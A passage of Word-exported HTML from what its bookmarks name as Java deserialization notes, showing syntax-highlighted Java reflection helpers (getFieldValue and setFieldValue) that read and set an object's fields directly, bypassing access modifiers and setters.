</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">catch</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">IllegalAccessException</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> e</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">//log.error("getFieldValue:", e);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">return</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> result</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">/**</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Cambria;">直接设置对象属性值,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Cambria;">忽略</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> private</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">/</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">protected </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Cambria;">修饰符,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Cambria;">也不经过</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> setter</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;"><span style="mso-spacerun:yes;">     </span>* @</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">param object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">@</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">param fieldName</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">@</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">param value</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*/</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">public</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">static</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">void</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">setFieldValue</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">String</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> fieldName</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> value</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Field</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> field </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getDeclaredField</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> fieldName</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">if</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">field </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">==</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">null</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">throw</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">new</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">IllegalArgumentException</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"Could not find field ["</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">+</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> fieldName </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">+</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"] on target ["</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">+</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> object </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">+</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"]"</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">makeAccessible</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">field</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">try</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span>field</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">set</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span 